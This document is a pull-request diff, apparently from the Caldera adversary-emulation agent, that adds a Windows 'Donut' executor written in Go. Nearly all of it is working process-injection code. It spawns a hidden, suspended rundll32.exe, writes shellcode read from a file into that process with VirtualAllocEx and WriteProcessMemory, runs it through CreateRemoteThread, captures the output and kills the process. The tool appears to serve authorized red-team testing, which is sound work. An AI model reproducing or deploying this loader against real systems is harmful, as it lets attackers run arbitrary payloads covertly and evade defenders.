### PR TITLE
[VIRTS-1023] Added initial Donut executor

### DIFF
--- a/app/extensions/donut/donut.py
+++ b/app/extensions/donut/donut.py
@@ -1,0 +1,18 @@
+from plugins.sandcat.app.utility.base_extension import Extension
+
+
+def load():
+    return Donut()
+
+
+class Donut(Extension):
+
+    def __init__(self):
+        directory = 'execute/donut'
+        super().__init__([
+            ('donut.go', directory),
+            ('dll_windows.go', directory),
+            ('donut_windows.go', directory),
+            ('donut_helper_windows.go', directory)
+        ])
+        self.dependencies = []

--- a/gocat-extensions/execute/donut/dll_windows.go
+++ b/gocat-extensions/execute/donut/dll_windows.go
@@ -1,0 +1,585 @@
+// +build windows
+
+package donut
+
+import (
+	"strconv"
+	"sync"
+	"sync/atomic"
+	"syscall"
+	"unsafe"
+)
+
+// Modified from https://github.com/golang/sys/blob/master/windows/security_windows.go#L778
+
+// GetSystemDirectory retrieves the path to current location of the system
+// directory, which is typically, though not always, `C:\Windows\System32`.
+func GetSystemDirectory() (string, error) {
+	n := uint32(syscall.MAX_PATH)
+	for {
+		b := make([]uint16, n)
+		l, e := getSystemDirectory(&b[0], n)
+		if e != nil {
+			return "", e
+		}
+		if l <= n {
+			return syscall.UTF16ToString(b[:l]), nil
+		}
+		n = l
+	}
+}
+
+// Modified from https://github.com/golang/sys/blob/master/windows/zsyscall_windows.go
+
+var _ unsafe.Pointer
+
+// Do the interface allocations only once for common
+// Errno values.
+const (
+	errnoERROR_IO_PENDING = 997
+)
+
+var (
+	errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
+)
+
+func errnoErr(e syscall.Errno) error {
+	switch e {
+	case 0:
+		return nil
+	case errnoERROR_IO_PENDING:
+		return errERROR_IO_PENDING
+	}
+
+	return e
+}
+
+var (
+	modkernel32 = NewLazySystemDLL("kernel32.dll")
+
+	procGetSystemDirectoryW = modkernel32.NewProc("GetSystemDirectoryW")
+	procLoadLibraryExW      = modkernel32.NewProc("LoadLibraryExW")
+	procCreateProcessW      = modkernel32.NewProc("CreateProcessW")
+	procVirtualAllocEx      = modkernel32.NewProc("VirtualAllocEx")
+	procWaitForSingleObject = modkernel32.NewProc("WaitForSingleObject")
+	procCreateRemoteThread  = modkernel32.NewProc("CreateRemoteThread")
+	procWriteProcessMemory  = modkernel32.NewProc("WriteProcessMemory")
+	procTerminateProcess    = modkernel32.NewProc("TerminateProcess")
+	procReadFile            = modkernel32.NewProc("ReadFile")
+	procResumeThread        = modkernel32.NewProc("ResumeThread")
+)
+
+func CreateProcess(appName *uint16, commandLine *uint16, procSecurity *syscall.SecurityAttributes, threadSecurity *syscall.SecurityAttributes, inheritHandles bool, creationFlags uint32, env *uint16, currentDir *uint16, startupInfo *syscall.StartupInfo, outProcInfo *syscall.ProcessInformation) (err error) {
+	var _p0 uint32
+	if inheritHandles {
+		_p0 = 1
+	} else {
+		_p0 = 0
+	}
+	r1, _, e1 := syscall.Syscall12(procCreateProcessW.Addr(), 10, uintptr(unsafe.Pointer(appName)), uintptr(unsafe.Pointer(commandLine)), uintptr(unsafe.Pointer(procSecurity)), uintptr(unsafe.Pointer(threadSecurity)), uintptr(_p0), uintptr(creationFlags), uintptr(unsafe.Pointer(env)), uintptr(unsafe.Pointer(currentDir)), uintptr(unsafe.Pointer(startupInfo)), uintptr(unsafe.Pointer(outProcInfo)), 0, 0)
+	if r1 == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func TerminateProcess(handle syscall.Handle, exitcode uint32) (err error) {
+	r1, _, e1 := syscall.Syscall(procTerminateProcess.Addr(), 2, uintptr(handle), uintptr(exitcode), 0)
+	if r1 == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func CreateRemoteThread(procHandle syscall.Handle, threadSecurity *syscall.SecurityAttributes, stackSize uintptr, startAddress uintptr, parameter uintptr, creationFlags uint32, ptrThreadId uintptr) (handle syscall.Handle, err error) {
+
+	r0, _, e1 := syscall.Syscall9(procCreateRemoteThread.Addr(), 7, uintptr(procHandle), uintptr(unsafe.Pointer(threadSecurity)), stackSize, startAddress, parameter, uintptr(creationFlags), ptrThreadId, 0, 0)
+	handle = syscall.Handle(r0)
+	if handle == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func LoadLibraryEx(libname string, zero syscall.Handle, flags uintptr) (handle syscall.Handle, err error) {
+	var _p0 *uint16
+	_p0, err = syscall.UTF16PtrFromString(libname)
+	if err != nil {
+		return
+	}
+	return _LoadLibraryEx(_p0, zero, flags)
+}
+
+func _LoadLibraryEx(libname *uint16, zero syscall.Handle, flags uintptr) (handle syscall.Handle, err error) {
+	r0, _, e1 := syscall.Syscall(procLoadLibraryExW.Addr(), 3, uintptr(unsafe.Pointer(libname)), uintptr(zero), uintptr(flags))
+	handle = syscall.Handle(r0)
+	if handle == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func VirtualAllocEx(procHandle syscall.Handle, address uintptr, size uintptr, alloctype uint32, protect uint32) (value uintptr, err error) {
+	r0, _, e1 := syscall.Syscall6(procVirtualAllocEx.Addr(), 5, uintptr(procHandle), uintptr(address), uintptr(size), uintptr(alloctype), uintptr(protect), 0)
+	value = uintptr(r0)
+	if value == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func WriteProcessMemory(procHandle syscall.Handle, address uintptr, bufferAddress uintptr, size uintptr, bytesWritten *uintptr) (success bool, err error) {
+	r0, _, e1 := syscall.Syscall6(procWriteProcessMemory.Addr(), 5, uintptr(procHandle), uintptr(address), uintptr(bufferAddress), uintptr(size), *bytesWritten, 0)
+
+	if r0 == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func getSystemDirectory(dir *uint16, dirLen uint32) (len uint32, err error) {
+	r0, _, e1 := syscall.Syscall(procGetSystemDirectoryW.Addr(), 2, uintptr(unsafe.Pointer(dir)), uintptr(dirLen), 0)
+	len = uint32(r0)
+	if len == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func WaitForSingleObject(handle syscall.Handle, waitMilliseconds uint32) (event uint32, err error) {
+	r0, _, e1 := syscall.Syscall(procWaitForSingleObject.Addr(), 2, uintptr(handle), uintptr(waitMilliseconds), 0)
+	event = uint32(r0)
+	if event == 0xffffffff {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+func ReadFile(handle syscall.Handle, buf uintptr, bufLen uintptr, done *uint32, overlapped *syscall.Overlapped) (err error) {
+
+	r1, _, e1 := syscall.Syscall6(procReadFile.Addr(), 5, uintptr(handle), buf, bufLen, uintptr(unsafe.Pointer(done)), uintptr(unsafe.Pointer(overlapped)), 0)
+	if r1 == 0 {
+		if e1 != 0 {
+			err = errnoErr(e1)
+		} else {
+			err = syscall.EINVAL
+		}
+	}
+	return
+}
+
+//ReadFile that may run as a goroutine
+func syncReadFile(handle syscall.Handle, buf uintptr, bufLen uintptr, done *uint32, overlapped *syscall.Overlapped, finished *bool, err *error) {
+
+	*err = ReadFile(handle, buf, bufLen, done, overlapped)
+
+	*finished = true
+}
+
+//Modified from https://github.com/golang/sys/blob/master/windows/dll_windows.go
+
+// We need to use LoadLibrary and GetProcAddress from the Go runtime, because
+// the these symbols are loaded by the system linker and are required to
+// dynamically load additional symbols. Note that in the Go runtime, these
+// return syscall.Handle and syscall.Errno, but these are the same, in fact,
+// as windows.Handle and windows.Errno, and we intend to keep these the same.
+
+//go:linkname syscall_loadlibrary syscall.loadlibrary
+func syscall_loadlibrary(filename *uint16) (handle syscall.Handle, err syscall.Errno)
+
+//go:linkname syscall_getprocaddress syscall.getprocaddress
+func syscall_getprocaddress(handle syscall.Handle, procname *uint8) (proc uintptr, err syscall.Errno)
+
+// DLLError describes reasons for DLL load failures.
+type DLLError struct {
+	Err     error
+	ObjName string
+	Msg     string
+}
+
+func (e *DLLError) Error() string { return e.Msg }
+
+// A DLL implements access to a single DLL.
+type DLL struct {
+	Name   string
+	Handle syscall.Handle
+}
+
+// LoadDLL loads DLL file into memory.
+//
+// Warning: using LoadDLL without an absolute path name is subject to
+// DLL preloading attacks. To safely load a system DLL, use LazyDLL
+// with System set to true, or use LoadLibraryEx directly.
+func LoadDLL(name string) (dll *DLL, err error) {
+	namep, err := syscall.UTF16PtrFromString(name)
+	if err != nil {
+		return nil, err
+	}
+	h, e := syscall_loadlibrary(namep)
+	if e != 0 {
+		return nil, &DLLError{
+			Err:     e,
+			ObjName: name,
+			Msg:     "Failed to load " + name + ": " + e.Error(),
+		}
+	}
+	d := &DLL{
+		Name:   name,
+		Handle: h,
+	}
+	return d, nil
+}
+
+// MustLoadDLL is like LoadDLL but panics if load operation failes.
+func MustLoadDLL(name string) *DLL {
+	d, e := LoadDLL(name)
+	if e != nil {
+		panic(e)
+	}
+	return d
+}
+
+// FindProc searches DLL d for procedure named name and returns *Proc
+// if found. It returns an error if search fails.
+func (d *DLL) FindProc(name string) (proc *Proc, err error) {
+	namep, err := syscall.BytePtrFromString(name)
+	if err != nil {
+		return nil, err
+	}
+	a, e := syscall_getprocaddress(d.Handle, namep)
+	if e != 0 {
+		return nil, &DLLError{
+			Err:     e,
+			ObjName: name,
+			Msg:     "Failed to find " + name + " procedure in " + d.Name + ": " + e.Error(),
+		}
+	}
+	p := &Proc{
+		Dll:  d,
+		Name: name,
+		addr: a,
+	}
+	return p, nil
+}
+
+// MustFindProc is like FindProc but panics if search fails.
+func (d *DLL) MustFindProc(name string) *Proc {
+	p, e := d.FindProc(name)
+	if e != nil {
+		panic(e)
+	}
+	return p
+}
+
+// Release unloads DLL d from memory.
+func (d *DLL) Release() (err error) {
+	return syscall.FreeLibrary(d.Handle)
+}
+
+// A Proc implements access to a procedure inside a DLL.
+type Proc struct {
+	Dll  *DLL
+	Name string
+	addr uintptr
+}
+
+// Addr returns the address of the procedure represented by p.
+// The return value can be passed to Syscall to run the procedure.
+func (p *Proc) Addr() uintptr {
+	return p.addr
+}
+
+//go:uintptrescapes
+
+// Call executes procedure p with arguments a. It will panic, if more than 15 arguments
+// are supplied.
+//
+// The returned error is always non-nil, constructed from the result of GetLastError.
+// Callers must inspect the primary return value to decide whether an error occurred
+// (according to the semantics of the specific function being called) before consulting
+// the error. The error will be guaranteed to contain windows.Errno.
+func (p *Proc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) {
+	switch len(a) {
+	case 0:
+		return syscall.Syscall(p.Addr(), uintptr(len(a)), 0, 0, 0)
+	case 1:
+		return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], 0, 0)
+	case 2:
+		return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], a[1], 0)
+	case 3:
+		return syscall.Syscall(p.Addr(), uintptr(len(a)), a[0], a[1], a[2])
+	case 4:
+		return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], 0, 0)
+	case 5:
+		return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], 0)
+	case 6:
+		return syscall.Syscall6(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5])
+	case 7:
+		return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], 0, 0)
+	case 8:
+		return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], 0)
+	case 9:
+		return syscall.Syscall9(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8])
+	case 10:
+		return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], 0, 0)
+	case 11:
+		return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], 0)
+	case 12:
+		return syscall.Syscall12(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11])
+	case 13:
+		return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], 0, 0)
+	case 14:
+		return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], a[13], 0)
+	case 15:
+		return syscall.Syscall15(p.Addr(), uintptr(len(a)), a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7], a[8], a[9], a[10], a[11], a[12], a[13], a[14])
+	default:
+		panic("Call " + p.Name + " with too many arguments " + strconv.Itoa(len(a)) + ".")
+	}
+}
+
+// A LazyDLL implements access to a single DLL.
+// It will delay the load of the DLL until the first
+// call to its Handle method or to one of its
+// LazyProc's Addr method.
+type LazyDLL struct {
+	Name string
+
+	// System determines whether the DLL must be loaded from the
+	// Windows System directory, bypassing the normal DLL search
+	// path.
+	System bool
+
+	mu  sync.Mutex
+	dll *DLL // non nil once DLL is loaded
+}
+
+// Load loads DLL file d.Name into memory. It returns an error if fails.
+// Load will not try to load DLL, if it is already loaded into memory.
+func (d *LazyDLL) Load() error {
+	// Non-racy version of:
+	// if d.dll != nil {
+	if atomic.LoadPointer((*unsafe.Pointer)(unsafe.Pointer(&d.dll))) != nil {
+		return nil
+	}
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	if d.dll != nil {
+		return nil
+	}
+
+	// kernel32.dll is special, since it's where LoadLibraryEx comes from.
+	// The kernel already special-cases its name, so it's always
+	// loaded from system32.
+	var dll *DLL
+	var err error
+	if d.Name == "kernel32.dll" {
+		dll, err = LoadDLL(d.Name)
+	} else {
+		dll, err = loadLibraryEx(d.Name, d.System)
+	}
+	if err != nil {
+		return err
+	}
+
+	// Non-racy version of:
+	// d.dll = dll
+	atomic.StorePointer((*unsafe.Pointer)(unsafe.Pointer(&d.dll)), unsafe.Pointer(dll))
+	return nil
+}
+
+// mustLoad is like Load but panics if search fails.
+func (d *LazyDLL) mustLoad() {
+	e := d.Load()
+	if e != nil {
+		panic(e)
+	}
+}
+
+// Handle returns d's module handle.
+func (d *LazyDLL) Handle() uintptr {
+	d.mustLoad()
+	return uintptr(d.dll.Handle)
+}
+
+// NewProc returns a LazyProc for accessing the named procedure in the DLL d.
+func (d *LazyDLL) NewProc(name string) *LazyProc {
+	return &LazyProc{l: d, Name: name}
+}
+
+// NewLazyDLL creates new LazyDLL associated with DLL file.
+func NewLazyDLL(name string) *LazyDLL {
+	return &LazyDLL{Name: name}
+}
+
+// NewLazySystemDLL is like NewLazyDLL, but will only
+// search Windows System directory for the DLL if name is
+// a base name (like "advapi32.dll").
+func NewLazySystemDLL(name string) *LazyDLL {
+	return &LazyDLL{Name: name, System: true}
+}
+
+// A LazyProc implements access to a procedure inside a LazyDLL.
+// It delays the lookup until the Addr method is called.
+type LazyProc struct {
+	Name string
+
+	mu   sync.Mutex
+	l    *LazyDLL
+	proc *Proc
+}
+
+// Find searches DLL for procedure named p.Name. It returns
+// an error if search fails. Find will not search procedure,
+// if it is already found and loaded into memory.
+func (p *LazyProc) Find() error {
+	// Non-racy version of:
+	// if p.proc == nil {
+	if atomic.LoadPointer((*unsafe.Pointer)(unsafe.Pointer(&p.proc))) == nil {
+		p.mu.Lock()
+		defer p.mu.Unlock()
+		if p.proc == nil {
+			e := p.l.Load()
+			if e != nil {
+				return e
+			}
+			proc, e := p.l.dll.FindProc(p.Name)
+			if e != nil {
+				return e
+			}
+			// Non-racy version of:
+			// p.proc = proc
+			atomic.StorePointer((*unsafe.Pointer)(unsafe.Pointer(&p.proc)), unsafe.Pointer(proc))
+		}
+	}
+	return nil
+}
+
+// mustFind is like Find but panics if search fails.
+func (p *LazyProc) mustFind() {
+	e := p.Find()
+	if e != nil {
+		panic(e)
+	}
+}
+
+// Addr returns the address of the procedure represented by p.
+// The return value can be passed to Syscall to run the procedure.
+// It will panic if the procedure cannot be found.
+func (p *LazyProc) Addr() uintptr {
+	p.mustFind()
+	return p.proc.Addr()
+}
+
+//go:uintptrescapes
+
+// Call executes procedure p with arguments a. It will panic, if more than 15 arguments
+// are supplied. It will also panic if the procedure cannot be found.
+//
+// The returned error is always non-nil, constructed from the result of GetLastError.
+// Callers must inspect the primary return value to decide whether an error occurred
+// (according to the semantics of the specific function being called) before consulting
+// the error. The error will be guaranteed to contain windows.Errno.
+func (p *LazyProc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) {
+	p.mustFind()
+	return p.proc.Call(a...)
+}
+
+var canDoSearchSystem32Once struct {
+	sync.Once
+	v bool
+}
+
+func initCanDoSearchSystem32() {
+	// https://msdn.microsoft.com/en-us/library/ms684179(v=vs.85).aspx says:
+	// "Windows 7, Windows Server 2008 R2, Windows Vista, and Windows
+	// Server 2008: The LOAD_LIBRARY_SEARCH_* flags are available on
+	// systems that have KB2533623 installed. To determine whether the
+	// flags are available, use GetProcAddress to get the address of the
+	// AddDllDirectory, RemoveDllDirectory, or SetDefaultDllDirectories
+	// function. If GetProcAddress succeeds, the LOAD_LIBRARY_SEARCH_*
+	// flags can be used with LoadLibraryEx."
+	canDoSearchSystem32Once.v = (modkernel32.NewProc("AddDllDirectory").Find() == nil)
+}
+
+func canDoSearchSystem32() bool {
+	canDoSearchSystem32Once.Do(initCanDoSearchSystem32)
+	return canDoSearchSystem32Once.v
+}
+
+func isBaseName(name string) bool {
+	for _, c := range name {
+		if c == ':' || c == '/' || c == '\\' {
+			return false
+		}
+	}
+	return true
+}
+
+// loadLibraryEx wraps the Windows LoadLibraryEx function.
+//
+// See https://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx
+//
+// If name is not an absolute path, LoadLibraryEx searches for the DLL
+// in a variety of automatic locations unless constrained by flags.
+// See: https://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx
+func loadLibraryEx(name string, system bool) (*DLL, error) {
+	loadDLL := name
+	var flags uintptr
+	if system {
+		if canDoSearchSystem32() {
+			const LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800
+			flags = LOAD_LIBRARY_SEARCH_SYSTEM32
+		} else if isBaseName(name) {
+			// WindowsXP or unpatched Windows machine
+			// trying to load "foo.dll" out of the system
+			// folder, but LoadLibraryEx doesn't support
+			// that yet on their system, so emulate it.
+			systemdir, err := GetSystemDirectory()
+			if err != nil {
+				return nil, err
+			}
+			loadDLL = systemdir + "\\" + name
+		}
+	}
+	h, err := LoadLibraryEx(loadDLL, 0, flags)
+	if err != nil {
+		return nil, err
+	}
+	return &DLL{Name: name, Handle: h}, nil
+}
+
+type errString string
+
+func (s errString) Error() string { return string(s) }

--- a/gocat-extensions/execute/donut/dll_windows.go
+++ b/gocat-extensions/execute/donut/dll_windows.go
@@ -33,8 +33,7 @@ func GetSystemDirectory() (string, error) {
 
 var _ unsafe.Pointer
 
-// Do the interface allocations only once for common
-// Errno values.
+// Do the interface allocations only once for common Errno values.
 const (
 	errnoERROR_IO_PENDING = 997
 )
@@ -66,7 +65,6 @@ var (
 	procWriteProcessMemory  = modkernel32.NewProc("WriteProcessMemory")
 	procTerminateProcess    = modkernel32.NewProc("TerminateProcess")
 	procReadFile            = modkernel32.NewProc("ReadFile")
-	procResumeThread        = modkernel32.NewProc("ResumeThread")
 )
 
 func CreateProcess(appName *uint16, commandLine *uint16, procSecurity *syscall.SecurityAttributes, threadSecurity *syscall.SecurityAttributes, inheritHandles bool, creationFlags uint32, env *uint16, currentDir *uint16, startupInfo *syscall.StartupInfo, outProcInfo *syscall.ProcessInformation) (err error) {

--- a/gocat-extensions/execute/donut/donut.go
+++ b/gocat-extensions/execute/donut/donut.go
@@ -23,12 +23,12 @@ func init() {
 	}
 }
 
-const COMMANDLINE = "rundll32.exe"
+const COMMANDLINE string = "rundll32.exe"
 
 func (d *Donut) Run(command string, timeout int) ([]byte, string, string) {
 	bytes, _ := ioutil.ReadFile(command)
 
-	handle, pid, stdout, stderr := CreateSuspendedProcessWithIORedirect("rundll32.exe")
+	handle, pid, stdout, stderr := CreateSuspendedProcessWithIORedirect(COMMANDLINE)
 
 	// Setup variables
 	stdoutBytes := make([]byte, 1)

--- a/gocat-extensions/execute/donut/donut.go
+++ b/gocat-extensions/execute/donut/donut.go
@@ -1,0 +1,66 @@
+// +build windows
+
+package donut
+
+import (
+	"fmt"
+	"io/ioutil"
+	"runtime"
+
+	"github.com/mitre/gocat/execute"
+)
+
+type Donut struct {
+	archName string
+}
+
+func init() {
+	runner := &Donut{
+		archName: "donut_" + runtime.GOARCH,
+	}
+	if runner.CheckIfAvailable() {
+		execute.Executors[runner.archName] = runner
+	}
+}
+
+const COMMANDLINE = "rundll32.exe"
+
+func (d *Donut) Run(command string, timeout int) ([]byte, string, string) {
+	bytes, _ := ioutil.ReadFile(command)
+
+	handle, pid, stdout, stderr := CreateSuspendedProcessWithIORedirect("rundll32.exe")
+
+	// Setup variables
+	stdoutBytes := make([]byte, 1)
+	stderrBytes := make([]byte, 1)
+	var eventCode uint32
+
+	// Run the shellcode and wait for it to complete
+	task, err := Runner(bytes, handle, stdout, &stdoutBytes, stderr, &stderrBytes, &eventCode)
+
+	// Assemble the final output
+	if task {
+
+		total := "Shellcode thread Exit Code: " + fmt.Sprint(eventCode) + "\n\n"
+
+		total += "STDOUT:\n"
+		total += string(stdoutBytes)
+		total += "\n\n"
+
+		total += "STDERR:\n"
+		total += string(stderrBytes)
+
+		return []byte(total), execute.SUCCESS_STATUS, fmt.Sprint(pid)
+	}
+
+	// Covers the cases where an error was received before the remote thread was created
+	return []byte(fmt.Sprintf("Shellcode execution failed. Error message: %s", fmt.Sprint(err))), execute.ERROR_STATUS, fmt.Sprint(pid)
+}
+
+func (d *Donut) String() string {
+	return d.archName
+}
+
+func (d *Donut) CheckIfAvailable() bool {
+	return IsAvailable()
+}

--- a/gocat-extensions/execute/donut/donut_helper_windows.go
+++ b/gocat-extensions/execute/donut/donut_helper_windows.go
@@ -1,0 +1,162 @@
+// +build windows
+
+package donut
+
+import (
+	"fmt"
+	"log"
+	"syscall"
+	"time"
+	"unsafe"
+
+	"github.com/mitre/gocat/output"
+)
+
+const (
+	MEM_COMMIT  = 0x1000
+	MEM_RESERVE = 0x2000
+
+	CREATE_SUSPENDED = 0x4
+	CREATE_NO_WINDOW = 0x08000000
+
+	SW_HIDE = 0
+)
+
+func CreateSuspendedProcessWithIORedirect(commandLine string) (syscall.Handle, uint32, syscall.Handle, syscall.Handle) {
+
+	// Create anonymous pipe for STDOUT
+	var stdOutRead syscall.Handle
+	var stdOutWrite syscall.Handle
+
+	errStdOutPipe := syscall.CreatePipe(&stdOutRead, &stdOutWrite, &syscall.SecurityAttributes{InheritHandle: 1}, 0)
+	errStdOutHandle := syscall.SetHandleInformation(stdOutRead, syscall.HANDLE_FLAG_INHERIT, 0)
+	if errStdOutPipe != nil && errStdOutHandle != nil {
+		output.VerbosePrint(fmt.Sprintf("[!]Error creating the STDOUT pipe:\r\n%s", errStdOutPipe.Error()))
+	}
+
+	// Create anonymous pipe for STDERR
+	var stdErrRead syscall.Handle
+	var stdErrWrite syscall.Handle
+
+	errStdErrPipe := syscall.CreatePipe(&stdErrRead, &stdErrWrite, &syscall.SecurityAttributes{InheritHandle: 1}, 0)
+	errStdErrHandle := syscall.SetHandleInformation(stdErrRead, syscall.HANDLE_FLAG_INHERIT, 0)
+	if errStdErrPipe != nil && errStdErrHandle != nil {
+		output.VerbosePrint(fmt.Sprintf("[!]Error creating the STDERR pipe:\r\n%s", errStdErrPipe.Error()))
+	}
+
+	procInfo := &syscall.ProcessInformation{}
+	startupInfo := &syscall.StartupInfo{
+		StdOutput:  stdOutWrite,
+		StdErr:     stdErrWrite,
+		Flags:      syscall.STARTF_USESTDHANDLES | CREATE_SUSPENDED,
+		ShowWindow: SW_HIDE,
+	}
+
+	errCreateProcess := CreateProcess(nil,
+		syscall.StringToUTF16Ptr(commandLine),
+		nil,
+		nil,
+		true,
+		CREATE_SUSPENDED|CREATE_NO_WINDOW,
+		nil,
+		nil,
+		startupInfo,
+		procInfo)
+
+	if errCreateProcess != nil && errCreateProcess.Error() != "The operation completed successfully." {
+		log.Fatal(fmt.Sprintf("[!]Error calling CreateProcess:\r\n%s", errCreateProcess.Error()))
+	}
+
+	//Close the stdout and stderr write handles
+	errCloseHandle := syscall.CloseHandle(stdOutWrite)
+	if errCloseHandle != nil {
+		output.VerbosePrint(fmt.Sprintf("[!]Error closing the STDOUT write handle:\r\n%s", errCloseHandle.Error()))
+	}
+	errCloseHandle = syscall.CloseHandle(stdErrWrite)
+	if errCloseHandle != nil {
+		output.VerbosePrint(fmt.Sprintf("[!]Error closing the STDERR write handle:\r\n%s", errCloseHandle.Error()))
+	}
+
+	return procInfo.Process, procInfo.ProcessId, stdOutRead, stdErrRead
+}
+
+func WaitReadBytes(handle syscall.Handle, tempBytes *[]byte, done *uint32) (err error) {
+
+	var overlapped syscall.Overlapped
+
+	var counter int
+	var finished bool
+
+	// Start reading from the pipe in another thread. That thread will block.
+	go syncReadFile(handle, (uintptr)(unsafe.Pointer(&(*tempBytes)[0])), uintptr(len(*tempBytes)), done, &overlapped, &finished, &err)
+
+	// Wait until ReadFile has stopped blocking or until timeout
+	for finished == false && counter < 5000 {
+
+		time.Sleep(50 * time.Millisecond)
+
+		counter += 50
+	}
+
+	return err
+
+}
+
+func ReadFromPipes(stdout syscall.Handle, stdoutBytes *[]byte, stderr syscall.Handle, stderrBytes *[]byte) (err error) {
+
+	tempBytes := make([]byte, 8192)
+
+	// Read STDOUT
+	if stdout != 0 {
+
+		for {
+			var stdOutDone uint32
+
+			err = WaitReadBytes(stdout, &tempBytes, &stdOutDone)
+
+			if int(stdOutDone) == 0 {
+				break
+			}
+			for _, b := range tempBytes {
+				*stdoutBytes = append(*stdoutBytes, b)
+			}
+
+			if err != nil {
+
+				if err.Error() != "The pipe has been ended." {
+					break
+				}
+
+			}
+
+		}
+	}
+
+	// Read STDERR
+	if stderr != 0 {
+
+		for {
+			var stdErrDone uint32
+
+			err = WaitReadBytes(stderr, &tempBytes, &stdErrDone)
+
+			if int(stdErrDone) == 0 {
+				break
+			}
+			for _, b := range tempBytes {
+				*stderrBytes = append(*stderrBytes, b)
+			}
+
+			if err != nil {
+
+				if err.Error() != "The pipe has been ended." {
+					break
+				}
+
+			}
+
+		}
+	}
+
+	return err
+}

--- a/gocat-extensions/execute/donut/donut_windows.go
+++ b/gocat-extensions/execute/donut/donut_windows.go
@@ -1,0 +1,123 @@
+// +build windows
+
+package donut
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// Runner runner
+func Runner(donut []byte, handle syscall.Handle, stdout syscall.Handle, stdoutBytes *[]byte, stderr syscall.Handle, stderrBytes *[]byte, eventCode *uint32) (bool, error) {
+
+	address, err := VirtualAllocEx(handle, 0, uintptr(len(donut)), MEM_COMMIT|MEM_RESERVE, syscall.PAGE_EXECUTE_READ)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	var bytesWritten uintptr
+
+	_, err = WriteProcessMemory(handle, address, (uintptr)(unsafe.Pointer(&donut[0])), uintptr(len(donut)), &bytesWritten)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+	var threadHandle syscall.Handle
+
+	threadHandle, err = CreateRemoteThread(handle, nil, 0, address, 0, 0, 0)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	*eventCode, err = WaitForSingleObject(threadHandle, 0xFFFFFFFF)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	err = ReadFromPipes(stdout, stdoutBytes, stderr, stderrBytes)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	//Close the thread handle
+	err = syscall.CloseHandle(threadHandle)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	//Terminate the sacrificial process
+	err = TerminateProcess(handle, 0)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	//close Process Handle
+	err = syscall.CloseHandle(handle)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	//close stdout Handle
+	err = syscall.CloseHandle(stdout)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	//close stderr Handle
+	err = syscall.CloseHandle(stderr)
+	if checkErrorMessage(err) {
+		return false, err
+	}
+
+	return true, err
+}
+
+func Cleanup(prochandle syscall.Handle, threadHandle syscall.Handle, stdout syscall.Handle, stderr syscall.Handle) (err error) {
+
+	//Close the thread handle
+	err = syscall.CloseHandle(threadHandle)
+	if checkErrorMessage(err) {
+		return err
+	}
+
+	//Terminate the sacrificial process
+	err = TerminateProcess(prochandle, 0)
+	if checkErrorMessage(err) {
+		return err
+	}
+
+	//close Process Handle
+	err = syscall.CloseHandle(prochandle)
+	if checkErrorMessage(err) {
+		return err
+	}
+
+	//close stdout Handle
+	err = syscall.CloseHandle(stdout)
+	if checkErrorMessage(err) {
+		return err
+	}
+
+	//close stderr Handle
+	err = syscall.CloseHandle(stderr)
+	if checkErrorMessage(err) {
+		return err
+	}
+
+	return err
+
+}
+
+// IsAvailable does a donut runner exist
+func IsAvailable() bool {
+
+	// Always returns true because only ntdll and kernel32 are referenced and they are always available
+	return true
+}
+
